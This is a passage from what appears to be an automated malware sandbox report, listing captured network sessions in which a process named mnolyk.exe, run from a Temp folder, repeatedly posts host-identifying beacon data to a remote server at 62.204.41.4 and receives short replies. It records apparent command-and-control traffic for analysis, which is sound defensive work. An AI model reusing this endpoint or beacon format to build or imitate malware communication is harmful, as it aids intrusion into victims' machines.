                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      164192.168.2.74985962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:44.659898996 CET279OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:44.728530884 CET279INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:44 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      165192.168.2.74986062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:44.917310953 CET280OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:44.983091116 CET280INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:44 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      166192.168.2.74986162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:45.159847975 CET281OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:45.223606110 CET281INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:45 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      167192.168.2.74986262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:45.411367893 CET282OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:45.477965117 CET282INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:45 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      168192.168.2.74986362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:45.653672934 CET283OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:45.718514919 CET283INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:45 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      169192.168.2.74986462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:45.902188063 CET284OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:45.966905117 CET284INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:45 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      17192.168.2.74971162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:05.695209980 CET121OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:05.759574890 CET121INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:05 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      170192.168.2.74986562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:46.144260883 CET285OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:46.209244013 CET285INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:46 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      171192.168.2.74986662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:46.384764910 CET286OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:46.450736046 CET286INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:46 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      172192.168.2.74986762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:46.640724897 CET287OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:46.707313061 CET287INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:46 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      173192.168.2.74986862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:46.881014109 CET288OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:46.946614027 CET288INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:46 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      174192.168.2.74986962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:47.148730040 CET289OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:47.216913939 CET289INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:47 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      175192.168.2.74987062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:47.398417950 CET290OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:47.464008093 CET290INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:47 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      176192.168.2.74987162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:47.646610975 CET291OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:47.711477995 CET291INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:47 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      177192.168.2.74987262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:47.908431053 CET292OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:47.973015070 CET292INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:47 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      178192.168.2.74987362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:48.143492937 CET293OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:48.210887909 CET293INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:48 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      179192.168.2.74987462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:48.380254030 CET294OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:48.444046974 CET294INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:48 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      18192.168.2.74971262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:05.940453053 CET122OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:06.005084991 CET122INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:05 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      180192.168.2.74987562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:48.616862059 CET295OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:48.682903051 CET295INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:48 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      181192.168.2.74987662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:48.864984989 CET296OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
